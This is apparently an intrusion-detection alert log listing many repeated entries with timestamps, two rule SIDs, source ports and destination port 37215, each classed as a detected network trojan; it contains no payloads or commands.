                Timestamp:05/29/24-15:15:41.222864
                SID:2829579
                Source Port:53736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674884
                SID:2829579
                Source Port:56956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276525
                SID:2829579
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548357
                SID:2835222
                Source Port:46766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731953
                SID:2835222
                Source Port:47928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913925
                SID:2835222
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689529
                SID:2829579
                Source Port:38904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994018
                SID:2829579
                Source Port:34032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797728
                SID:2835222
                Source Port:57398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.590660
                SID:2835222
                Source Port:49342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980655
                SID:2835222
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941588
                SID:2829579
                Source Port:40856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844789
                SID:2835222
                Source Port:54450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909218
                SID:2835222
                Source Port:37438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896020
                SID:2835222
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210792
                SID:2835222
                Source Port:45286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708474
                SID:2835222
                Source Port:45326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335499
                SID:2835222
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390365
                SID:2835222
                Source Port:36486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950201
                SID:2835222
                Source Port:50226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.797604
                SID:2835222
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361517
                SID:2829579
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329391
                SID:2829579
                Source Port:40850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615194
                SID:2835222
                Source Port:46252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897643
                SID:2835222
                Source Port:41796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897176
                SID:2835222
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613938
                SID:2835222
                Source Port:48936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928014
                SID:2829579
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873205
                SID:2829579
                Source Port:48850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531090
                SID:2829579
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127821
                SID:2835222
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958122
                SID:2835222
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226644
                SID:2829579
                Source Port:40016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630050
                SID:2829579
                Source Port:41748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722009
                SID:2829579
                Source Port:43650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464694
                SID:2835222
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019125
                SID:2835222
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912962
                SID:2829579
                Source Port:57384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218232
                SID:2835222
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789364
                SID:2829579
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328145
                SID:2829579
                Source Port:45894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655732
                SID:2829579
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228265
                SID:2835222
                Source Port:56678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228346
                SID:2829579
                Source Port:35566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785464
                SID:2835222
                Source Port:49344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613827
                SID:2835222
                Source Port:53666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.104901
                SID:2829579
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223872
                SID:2829579
                Source Port:33856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714054
                SID:2835222
                Source Port:42780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180648
                SID:2835222
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905459
                SID:2829579
                Source Port:46904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971483
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555623
                SID:2835222
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955869
                SID:2829579
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997484
                SID:2835222
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615146
                SID:2835222
                Source Port:44918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275240
                SID:2829579
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795245
                SID:2829579
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2835222
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667423
                SID:2835222
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899176
                SID:2829579
                Source Port:36662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724581
                SID:2835222
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522530
                SID:2829579
                Source Port:46526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514590
                SID:2835222
                Source Port:60374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871656
                SID:2835222
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215324
                SID:2829579
                Source Port:45418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737242
                SID:2835222
                Source Port:37068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559051
                SID:2829579
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725419
                SID:2835222
                Source Port:51276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2835222
                Source Port:41906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111285
                SID:2829579
                Source Port:40758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907997
                SID:2829579
                Source Port:49750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762972
                SID:2829579
                Source Port:55912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847194
                SID:2835222
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266966
                SID:2829579
                Source Port:57284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432726
                SID:2829579
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667852
                SID:2835222
                Source Port:49266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209654
                SID:2829579
                Source Port:35174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651749
                SID:2829579
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557811
                SID:2829579
                Source Port:49956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766900
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810392
                SID:2835222
                Source Port:47846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984838
                SID:2835222
                Source Port:43436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800372
                SID:2829579
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066619
                SID:2835222
                Source Port:50470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543947
                SID:2829579
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.613063
                SID:2829579
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518848
                SID:2835222
                Source Port:47180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517975
                SID:2829579
                Source Port:36446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562062
                SID:2835222
                Source Port:38756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861966
                SID:2829579
                Source Port:39842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993030
                SID:2835222
                Source Port:42720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559937
                SID:2829579
                Source Port:60774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818109
                SID:2835222
                Source Port:58340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712882
                SID:2835222
                Source Port:57182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811074
                SID:2835222
                Source Port:56812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544438
                SID:2835222
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945011
                SID:2835222
                Source Port:50502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231021
                SID:2829579
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140859
                SID:2829579
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843917
                SID:2829579
                Source Port:33488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272391
                SID:2835222
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798406
                SID:2835222
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665252
                SID:2829579
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639762
                SID:2835222
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616284
                SID:2835222
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763757
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338515
                SID:2835222
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521734
                SID:2835222
                Source Port:51052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591173
                SID:2829579
                Source Port:57268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854356
                SID:2835222
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966439
                SID:2829579
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997256
                SID:2829579
                Source Port:45838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631411
                SID:2835222
                Source Port:35434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418327
                SID:2829579
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517956
                SID:2835222
                Source Port:37076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899223
                SID:2835222
                Source Port:34502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560854
                SID:2829579
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210932
                SID:2835222
                Source Port:34006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520431
                SID:2829579
                Source Port:45804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979360
                SID:2829579
                Source Port:37814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615134
                SID:2829579
                Source Port:47030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422200
                SID:2829579
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281714
                SID:2835222
                Source Port:51402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814868
                SID:2829579
                Source Port:51504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212845
                SID:2829579
                Source Port:53052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472085
                SID:2835222
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074019
                SID:2835222
                Source Port:45266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717361
                SID:2829579
                Source Port:47898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463000
                SID:2829579
                Source Port:43716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169104
                SID:2829579
                Source Port:40782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135878
                SID:2835222
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.862768
                SID:2829579
                Source Port:45350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263617
                SID:2829579
                Source Port:33894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437178
                SID:2835222
                Source Port:33820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226671
                SID:2829579
                Source Port:36044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908033
                SID:2829579
                Source Port:58450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915333
                SID:2835222
                Source Port:42158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557871
                SID:2835222
                Source Port:58854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555973
                SID:2829579
                Source Port:36740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639699
                SID:2829579
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460480
                SID:2835222
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773324
                SID:2829579
                Source Port:33564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265728
                SID:2835222
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783183
                SID:2829579
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.609154
                SID:2829579
                Source Port:45696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519929
                SID:2829579
                Source Port:34824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171086
                SID:2835222
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226850
                SID:2829579
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511083
                SID:2829579
                Source Port:38656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224686
                SID:2829579
                Source Port:36246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997426
                SID:2829579
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812107
                SID:2835222
                Source Port:43922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091057
                SID:2835222
                Source Port:40822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919531
                SID:2829579
                Source Port:54020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233948
                SID:2829579
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853109
                SID:2829579
                Source Port:40728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373863
                SID:2829579
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140902
                SID:2829579
                Source Port:59116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562034
                SID:2829579
                Source Port:43558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520437
                SID:2829579
                Source Port:50666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2835222
                Source Port:54088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286965
                SID:2829579
                Source Port:48142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008993
                SID:2829579
                Source Port:42106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360614
                SID:2835222
                Source Port:37042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378803
                SID:2829579
                Source Port:53086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071808
                SID:2835222
                Source Port:49606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236411
                SID:2835222
                Source Port:33712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911210
                SID:2835222
                Source Port:47614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463537
                SID:2835222
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908069
                SID:2829579
                Source Port:44542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287797
                SID:2835222
                Source Port:48192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685743
                SID:2829579
                Source Port:39680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784318
                SID:2835222
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.096281
                SID:2829579
                Source Port:46334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916959
                SID:2829579
                Source Port:37540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970490
                SID:2835222
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672431
                SID:2829579
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579330
                SID:2835222
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943116
                SID:2829579
                Source Port:54512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394703
                SID:2829579
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271245
                SID:2835222
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800961
                SID:2835222
                Source Port:53092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731813
                SID:2829579
                Source Port:46758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675458
                SID:2829579
                Source Port:40362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519180
                SID:2835222
                Source Port:52346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630671
                SID:2829579
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113932
                SID:2829579
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384444
                SID:2829579
                Source Port:60152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422005
                SID:2835222
                Source Port:46872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918426
                SID:2835222
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766387
                SID:2835222
                Source Port:60206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264354
                SID:2829579
                Source Port:35206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465884
                SID:2835222
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414874
                SID:2835222
                Source Port:52776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.285881
                SID:2835222
                Source Port:53578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227507
                SID:2829579
                Source Port:46388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813571
